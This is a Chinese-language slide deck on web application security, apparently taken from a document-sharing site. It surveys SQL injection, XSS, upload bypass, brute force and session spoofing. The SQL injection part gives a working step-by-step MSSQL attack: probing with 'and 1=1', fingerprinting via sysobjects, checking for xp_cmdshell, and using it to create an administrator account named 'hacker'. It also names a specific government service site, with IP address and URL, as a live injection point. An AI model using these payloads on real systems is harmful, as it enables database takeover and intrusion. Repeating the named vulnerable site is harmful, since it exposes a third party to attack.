应用与开发安全
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
聂万泉(Wquan.Nie)
CISSP(Associate) Advanced programmer Email:SoftDev@c‐
QQ:256796
MSN:nagemeiyou@
¾常用的Web攻击手法¾如何安全的与用户交互¾加密技术Web开发应用¾Web开发与数据库安全¾Web安全测试
¾Sql Injection
¾Xss(跨站脚本攻击)
¾bypass Upload
¾Brute Force(穷举)
¾Session Spoof
¾Remote/Local File Include
¾程序向程序文件内写入参数¾其它攻击方法
利用现有的应用程序没有对用户输入数据进行检查和过滤的缺陷,将恶意的SQL命令注入到后台数据库引擎执行,达到获取数据,甚至控制数据库服务器的目的.
典型例子:
/index.asp?id=8and (select count(*) from sysobjects)>0
•Sql注入的漏洞是在编程时造成的
•后台数据库允许动态SQL语句执行
•前台应用程序没有对用户输入的数据或者页面提交的信息进行必要的安全检查
•数据库自身的特性造成的,与编程语言无关.
•绕过防火墙进行攻击
•绕过web应用程序的验证过程•非法越权操作数据库内容•随意篡改网页内容
•添加系统帐户或数据库帐户•上传和下载非法文件
•本地溢出并获取系统最高权限•安装木马后门网络僵尸
•JSP应用程序
•PHP应用程序
•Asp应用程序
•.net应用程序
•MSSQL (危害最大)
•Mysql
•Oracle
•其它数据库Sybase,DB2,Access
小榕工具WIS,WED NBSI
阿D注入工具
明小子 …………
1.判断是否存在注入
在页面地址后面加’|and 1=1|and 1=2
返回显示错误或不正常代表有注入漏洞
2.判断数据库类型
Id=1 and (select count(*) from sysobjects)>0
可判断是MSSQL还是ACCESS
3.判断当前权限
Id=1 and 1=(SELECT IS_MEMBER(\'db_owner\'));‐‐
db_owner可更换成其它mssql角色名比如SYSADMIN
4.检查扩展存储是否存在
Select count(*) from master.dbo.sysobjects where xtype=\'x\' and
name=\'xp_cmdshell\‘
5.SA权限模式下建立系统用户
;exec master.dbo.xp_cmdshell \'net user hacker 123456 /add\'
;exec master.dbo.xp_cmdshell \'net localgroup administrators hacker /add\'
z http://61.49.38.1/wssp/shenbaofront/index.jsp
海淀区人民政府行政办事中心‐网上申报平台
注入点:
http://61.49.38.1:80/wssp/shenbaofront/question_text.jsp?act=questioninfo&que stion
检测截图:
z Cross site Scripting (XSS)
黑客在应用程序中非法插入HTML代码当受害者浏览该页时,嵌入其中的恶意代码会被执行,从而达到恶意目的.
z XSS的攻击类型
1.跨站点的攻击,特指在虚拟主机上的攻击方式.
2.针对session,Cookie的劫持攻击
3.恶作剧攻击
4.Xss攻击通常要与社会工程学结合起来使用
5.模拟用户完成多页表单。
•XSS攻击导致恶意攻击者
1.绕过访问控制
2.权限提升
3.篡改网站页面
4.得到敏感信息(用户帐号,密码,信用卡等)
5. 其它
•敏感数据被获取(Cookie 盗窃)•网络钓鱼
•获取Web用户浏览的网页内容•Session Riding(CSRF攻击)
•获取用户的键盘击键数据•Web僵尸,典型工具为Xss_Proxy •Xss蠕虫
1.怎么检测XSS
2.怎么样利用XSS
3.抓取管理员的Cookie/session,欺骗服务器提升权限
z上传程序对上传文件的扩展名验证不严z构造图片包头欺骗服务器
z对网页的验证表单能过使用字典或组合算法的方式进行暴力猜解.
z只要时间足够,破解的成功率是%100,但时间也不是常人可以接受的.
z该攻击方法需先旁注成功取得服务器中某一站点的权限.
z通过修改服务器中的Session表,提升Session 中的权限等级.拿下其它站点中用户的管理员权限